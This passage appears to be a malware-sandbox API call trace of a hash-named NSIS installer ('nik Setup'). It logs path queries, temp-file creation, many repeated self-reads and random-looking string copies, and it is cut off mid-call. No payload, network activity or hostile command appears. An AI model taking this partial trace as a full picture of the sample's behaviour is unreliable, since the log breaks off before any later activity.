(lpModuleName="SHFOLDER") returned 0x0 [0112.607] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.607] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0112.607] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x6cb20000 [0112.618] GetProcAddress (hModule=0x6cb20000, lpProcName="SHGetFolderPathW") returned 0x6cb21d30 [0112.619] GetModuleHandleA (lpModuleName="SHLWAPI") returned 0x77680000 [0112.619] GetProcAddress (hModule=0x77680000, lpProcName=0x1b5) returned 0x77698dd0 [0112.619] IsOS (dwOS=0x1e) returned 1 [0112.619] InitCommonControls () [0112.619] OleInitialize (pvReserved=0x0) returned 0x0 [0112.654] SHGetFileInfoW (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fb8c, cbFileInfo=0x2b4, uFlags=0x0 | out: psfi=0x19fb8c) returned 0x1 [0112.741] lstrcpynW (in: lpString1=0x429220, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0112.741] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe\" " [0112.741] lstrcpynW (in: lpString1=0x435000, lpString2="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe\" ") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe\" " [0112.744] GetTempPathW (in: nBufferLength=0x400, lpBuffer=0x437800 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0112.751] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0112.751] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0112.751] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0112.752] GetLastError () returned 0xb7 [0112.752] GetTickCount () returned 0x1c50582 [0112.752] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsa", uUnique=0x0, lpTempFileName=0x437000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa582.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa582.tmp")) returned 0x582 [0112.759] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa582.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa582.tmp")) returned 1 [0112.759] GetTickCount () returned 0x1c50582 [0112.759] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x438800, nSize=0x400 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe")) returned 0x62 [0112.760] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe")) returned 0x20 [0112.760] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x210 [0112.760] lstrcpynW (in: lpString1=0x436800, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" [0112.760] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe") returned 98 [0112.762] lstrcpynW (in: lpString1=0x439000, lpString2="285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe", iMaxLength=1024 | out: lpString1="285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe") returned="285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" [0112.763] GetFileSize (in: hFile=0x210, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x358b5 [0112.763] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.767] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.768] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.769] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.769] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.769] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.769] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0112.769] SetFilePointer (in: hFile=0x210, lDistanceToMove=36892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x901c [0112.769] ReadFile (in: hFile=0x210, lpBuffer=0x19fb3c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x19fb3c*, lpNumberOfBytesRead=0x19fa7c*=0x4, lpOverlapped=0x0) returned 1 [0112.769] GetTickCount () returned 0x1c50592 [0112.769] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x6af, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19fa7c*=0x6af, lpOverlapped=0x0) returned 1 [0112.802] GetTickCount () returned 0x1c505b1 [0112.803] GetTickCount () returned 0x1c505b1 [0112.803] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96cf [0112.803] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74580000 [0112.803] GetProcAddress (hModule=0x74580000, lpProcName="GetUserDefaultUILanguage") returned 0x7459b0a0 [0112.803] GetUserDefaultUILanguage () returned 0x409 [0112.806] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0112.806] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0112.806] lstrlenW (lpString="nik") returned 3 [0112.806] lstrcpynW (in: lpString1=0x429220, lpString2="nik Setup", iMaxLength=1024 | out: lpString1="nik Setup") returned="nik Setup" [0112.806] SetWindowTextW (hWnd=0x0, lpString="nik Setup") returned 0 [0112.806] lstrcpynW (in: lpString1=0x592e64, lpString2="cwocdmsgmtvpp", iMaxLength=1024 | out: lpString1="cwocdmsgmtvpp") returned="cwocdmsgmtvpp" [0112.806] lstrcpynW (in: lpString1=0x59367c, lpString2="ldjvyogoxi", iMaxLength=1024 | out: lpString1="ldjvyogoxi") returned="ldjvyogoxi" [0112.806] lstrcpynW (in: lpString1=0x593e94, lpString2="lamjoviqbpode", iMaxLength=1024 | out: lpString1="lamjoviqbpode") returned="lamjoviqbpode" [0112.806] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0112.806] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0112.806] lstrcpynW (in: 